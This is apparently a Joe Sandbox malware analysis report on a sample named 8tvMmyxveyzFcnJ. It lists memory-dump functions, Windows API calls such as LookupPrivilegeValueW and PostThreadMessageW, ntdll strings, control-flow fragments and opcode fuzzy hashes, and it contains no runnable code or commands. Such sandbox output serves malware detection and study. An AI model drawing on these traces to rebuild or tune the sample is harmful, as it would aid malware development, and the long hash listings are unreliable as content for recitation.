              • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
              • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
              • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
              Function 013F2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: d208d12b4b75d97e9a929b357e383fee6bb45a784ed539da1641cc64d77f1b62
              • Instruction ID: b04462930b64444472992489cf7867f9500ee920909b320a7d27ae53cfb9f1af
              • Opcode Fuzzy Hash: d208d12b4b75d97e9a929b357e383fee6bb45a784ed539da1641cc64d77f1b62
              • Instruction Fuzzy Hash: 4990026161280143410671594514616400A97F0201B55C032E10145D5DC63589D16625
              Function 013F2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 9a4d2e2a829355d9e8d2ea84772a699bd1bad711a484aa17fce7e11ee2075261
              • Instruction ID: 9dd3d6852a32a5dc1681b0446b91f4ea8ada641ffe62a0c62f8b351ad2be71a0
              • Opcode Fuzzy Hash: 9a4d2e2a829355d9e8d2ea84772a699bd1bad711a484aa17fce7e11ee2075261
              • Instruction Fuzzy Hash: 2E90023161180942D1817159450464A000597E1301F95C026A0025699DCB358B997BA1
              Function 013F2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: b2218faa09ebe26234943c544ffabbafc8a17aee03803644d226be50c7dc1afe
              • Instruction ID: b94ff99e4ae1cf3893ccb3da1d07755c33cba2f4c002eceb066e6a52469c29f0
              • Opcode Fuzzy Hash: b2218faa09ebe26234943c544ffabbafc8a17aee03803644d226be50c7dc1afe
              • Instruction Fuzzy Hash: 4F900225621801430106B5590704507004697E5351355C032F1015595CD73189A15621
              Function 013F2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 2a095cb38ca433d3508dee535f10912eff9a6ab77af6e71cf74236239f02510d
              • Instruction ID: 1a73d034470c272ec62f72be95b3df8f1b9e506cb41fd57f39028bdb9bc80c12
              • Opcode Fuzzy Hash: 2a095cb38ca433d3508dee535f10912eff9a6ab77af6e71cf74236239f02510d
              • Instruction Fuzzy Hash: 1990022171180143D141715955186064005E7F1301F55D022E0414599CDA3589965722
              Function 013F2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 0a3e9d628daddd4a5c7b3c783b0aee48db092d28d1c6cadd91bb84d07f7615c6
              • Instruction ID: 77900da0c02f8d5bed2c7325aef9f96b2ca3627c205a286beeed864687099072
              • Opcode Fuzzy Hash: 0a3e9d628daddd4a5c7b3c783b0aee48db092d28d1c6cadd91bb84d07f7615c6
              • Instruction Fuzzy Hash: C990022962380142D1817159550860A000597E1202F95D426A001559DCCA3589A95721
              Function 013F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 56a08a3936f89341aba5a2d687c57eb08a992b10046c0bbf8e0dd95a94d0ec11
              • Instruction ID: c1f91a5473c388d4e295ec2b9208c2d6c648bfc0214ac60bfb8534ea61156d2d
              • Opcode Fuzzy Hash: 56a08a3936f89341aba5a2d687c57eb08a992b10046c0bbf8e0dd95a94d0ec11
              • Instruction Fuzzy Hash: 0F90023161180553D11271594604707000997E0241F95C423A042459DDD7768A92A621
              Function 013F2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 72cde6163dae4f3f70a6ba2d8bd77392838c8edf73eeb2587db24ab7ade9bdcb
              • Instruction ID: ae56a6fc7267ee771b6fd9efa93172b67a0dd7ace343ebfed6081d6e1a7f7561
              • Opcode Fuzzy Hash: 72cde6163dae4f3f70a6ba2d8bd77392838c8edf73eeb2587db24ab7ade9bdcb
              • Instruction Fuzzy Hash: D9900221652842925546B15945045074006A7F0241795C023A1414995CC6369996DB21
              Function 013F2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 26abf816c0bd0d527bd554ced65dc960d12b95e29249d2c296c8777527dcfe12
              • Instruction ID: 588fe6cd9f00427923295f1e6f00f600b68916a487e5e663b196aed6db70798d
              • Opcode Fuzzy Hash: 26abf816c0bd0d527bd554ced65dc960d12b95e29249d2c296c8777527dcfe12
              • Instruction Fuzzy Hash: 8390023161188942D1117159850474A000597E0301F59C422A442469DDC7B589D17621
              Function 013F2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 629aba4f87020cc04c501b4c1f5e0876edfc5168b70f85239aba709ecbce8861
              • Instruction ID: f3e51471236954a8844cd96be8afc5d239b5dbb3e72e5230e4107833c4f73e97
              • Opcode Fuzzy Hash: 629aba4f87020cc04c501b4c1f5e0876edfc5168b70f85239aba709ecbce8861
              • Instruction Fuzzy Hash: E590023161180542D10175995508646000597F0301F55D022A502459AEC77589D16631
              Function 013F2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: ad21fef94bac7f0e79fb4939eb4f24c05dbbbdd16aa91b6548710ab53a1d94a6
              • Instruction ID: fb92b34038529c54098faeb211e5e05ff32b140b6076f0cb61388313516acff6
              • Opcode Fuzzy Hash: ad21fef94bac7f0e79fb4939eb4f24c05dbbbdd16aa91b6548710ab53a1d94a6
              • Instruction Fuzzy Hash: 3890026175180582D10171594514B060005D7F1301F55C026E1064599DC739CD926626
              Function 013F2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 828b5acacdfa36c9fbb949f903d4449613c81e7b35289ee2dd40660ede63364b
              • Instruction ID: c2b5fc2d5a20dbc90f76d067d55e38de03c518b919734ca72a028cb1cf4b5cb0
              • Opcode Fuzzy Hash: 828b5acacdfa36c9fbb949f903d4449613c81e7b35289ee2dd40660ede63364b
              • Instruction Fuzzy Hash: E0900221A11801824141716989449064005BBF1211755C132A0998595DC67989A55B65
              Function 013F2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 77d5fdf32d889c85e7123603595057a7bef3e6d3636ca9e9617c98da67963b6d
              • Instruction ID: a7c696121c9ce28c566e8f2a823ff29dd7cadda9083a310d9dc51ad92fc3f755
              • Opcode Fuzzy Hash: 77d5fdf32d889c85e7123603595057a7bef3e6d3636ca9e9617c98da67963b6d
              • Instruction Fuzzy Hash: 2E900231611C0542D1017159491470B000597E0302F55C022A116459ADC73589916A71
              Function 013F2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: cc1187fdac668db936ee0ec9bca2f1f97f7f15f4d3c2bcbcff0047bf87a88e21
              • Instruction ID: b759bf00f82472ca03463fdc274b13b8128b21af2243890893ae4fbf17d392d6
              • Opcode Fuzzy Hash: cc1187fdac668db936ee0ec9bca2f1f97f7f15f4d3c2bcbcff0047bf87a88e21
              • Instruction Fuzzy Hash: 4B900221621C0182D20175694D14B07000597E0303F55C126A0154599CCA3589A15A21
              Function 013F2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 6baadb38c815acfd41156cf3241b88e2f11f97e86d70f2d39bdd9235a0e3aa97
              • Instruction ID: d60d58dc601e7c5d857c73e2f9e4762801d51b0af1150357633be40b7a96df7b
              • Opcode Fuzzy Hash: 6baadb38c815acfd41156cf3241b88e2f11f97e86d70f2d39bdd9235a0e3aa97
              • Instruction Fuzzy Hash: 0B90027161180542D14171594504746000597E0301F55C022A5064599EC7798ED56B65
              Function 013F2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 2c532ceadafe775573fa0acf4455da864b0a68356b5ef2935d6e608f65ffe58a
              • Instruction ID: 5bda666a619403412e6fef4579ff928c7c6938de5f9018f84788daef187ef303
              • Opcode Fuzzy Hash: 2c532ceadafe775573fa0acf4455da864b0a68356b5ef2935d6e608f65ffe58a
              • Instruction Fuzzy Hash: 2D900221A1180642D10271594504616000A97E0241F95C033A102459AECB358AD2A631
              Function 00409AB0 Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
              • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
              • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
              • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
              Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
              APIs
              • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID: 6EA
              • API String ID: 1279760036-1400015478
              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
              • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
              • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
              Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 204 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 213 40835c-40836e PostThreadMessageW 204->213 214 40838e-408392 204->214 215 408370-40838a call 40a480 213->215 216 40838d 213->216 215->216 216->214
              APIs
              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: ad6e92db074ec06a213529fc4cf0a505365d433dce961343fd20306699894531
              • Instruction ID: 5992b9be4baf2c7b566ef3647458cd36ce21ba925a148f2579bd006564dde71f
              • Opcode Fuzzy Hash: ad6e92db074ec06a213529fc4cf0a505365d433dce961343fd20306699894531
              • Instruction Fuzzy Hash: 9601D871A9032877E721A6959C43FFE7B6C9B44F94F04011DFF04BA1C2EAE8690543EA
              Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 219 408310-40831f 220 408328-40835a call 41ca00 call 40acf0 call 414e50 219->220 221 408323 call 41be60 219->221 228 40835c-40836e PostThreadMessageW 220->228 229 40838e-408392 220->229 221->220 230 408370-40838a call 40a480 228->230 231 40838d 228->231 230->231 231->229
              APIs
              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
              • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
              • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
              • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
              Function 0041A663 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 261 41a663-41a687 call 41af60 263 41a68c-41a6a1 RtlFreeHeap 261->263
              APIs
              • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: c6bfbd0e50fad47e42f28fde3aa2b8a84a11a10a947687da3d496739955b5f60
              • Instruction ID: 24307b1b16fdc674b1b2a46e27d06997c9a9b4145e39e254628283c940cb61d2
              • Opcode Fuzzy Hash: c6bfbd0e50fad47e42f28fde3aa2b8a84a11a10a947687da3d496739955b5f60
              • Instruction Fuzzy Hash: 37E065B51142146FD724DF68CC48E9B776CDF48A54F118659B95857291C530E91087A0
              Function 0041A7C9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 264 41a7c9-41a7ea call 41af60 267 41a7ef-41a804 LookupPrivilegeValueW 264->267
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 6eef14145c37bd4ce939ac30feff25a05528fb10757d3c4a07bdb24ae85c2ea4
              • Instruction ID: af75529915aef102090087d8ecb2994e73b38dbc4dd88fb73fd8a3c03c61f894
              • Opcode Fuzzy Hash: 6eef14145c37bd4ce939ac30feff25a05528fb10757d3c4a07bdb24ae85c2ea4
              • Instruction Fuzzy Hash: 28E06DB12002086FCB24DF65CC85EDB3769EF49350F118158F90D97241CA35E8118BB0
              Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 268 41a670-41a686 269 41a68c-41a6a1 RtlFreeHeap 268->269 270 41a687 call 41af60 268->270 270->269
              APIs
              • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
              • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
              • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
              Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
              Download Yara Rule
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
              • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
              • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
              Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
              Download Yara Rule
              APIs
              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
              • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
              • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
              Function 013F2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: be1a45ff1c783afca4ed5f8db2847d83c70a74692a8304be6e2f9e853d9c4056
              • Instruction ID: 40f17b9abc4e5a11b7234fde54eca58a87b5f9aed2c49df71f13bedcf31bee13
              • Opcode Fuzzy Hash: be1a45ff1c783afca4ed5f8db2847d83c70a74692a8304be6e2f9e853d9c4056
              • Instruction Fuzzy Hash: 26B09B71D019C5C5DE12E76447087177900B7D0705F15C076D3030686F8738C1D1E675

              Non-executed Functions

              Function 01432349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
              • API String ID: 0-2160512332
              • Opcode ID: 57a4aaba3fd7b6091dec39b91a55d8271e8afc12d2db20e78ca99cf338697e31
              • Instruction ID: 0690fbc85b6e39226d86efc5590c0ad3a02e0fd217d974e5ad1ae8dc7e2427fc
              • Opcode Fuzzy Hash: 57a4aaba3fd7b6091dec39b91a55d8271e8afc12d2db20e78ca99cf338697e31
              • Instruction Fuzzy Hash: 33928E71604342ABE725DF29C841F6BBBE8BB88754F04491EFA94D7360D7B0E845CB92
              Function 014612ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
              • API String ID: 0-3591852110
              • Opcode ID: 4915862e755b5d441fcfc379916cf48e33ee602334ef286fedebb6e85405fea6
              • Instruction ID: 68d097e5d54a4c8e506d4ad0f3b3e78698075fc68937b6e9b385581a2c2b37a5
              • Opcode Fuzzy Hash: 4915862e755b5d441fcfc379916cf48e33ee602334ef286fedebb6e85405fea6
              • Instruction Fuzzy Hash: 5D12AE34600642DFD7259F29C441BBABBF9FF99B18F08845EE4868B761D734E881CB52
              Function 013AD34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
              • API String ID: 0-3532704233
              • Opcode ID: 34c37e292e05164fbad1cd06f4efc8544435590ce4a97bb17eb6b689e3f279a3
              • Instruction ID: 6ae12e2d8854cba3bc5ae6f3c957366b5808588e5582c8c233b91e07c791a81d
              • Opcode Fuzzy Hash: 34c37e292e05164fbad1cd06f4efc8544435590ce4a97bb17eb6b689e3f279a3
              • Instruction Fuzzy Hash: 8AB1AE72508316DFD712DF69C440A6FBBE8FB84758F81492EF989D7650D730DA088B92
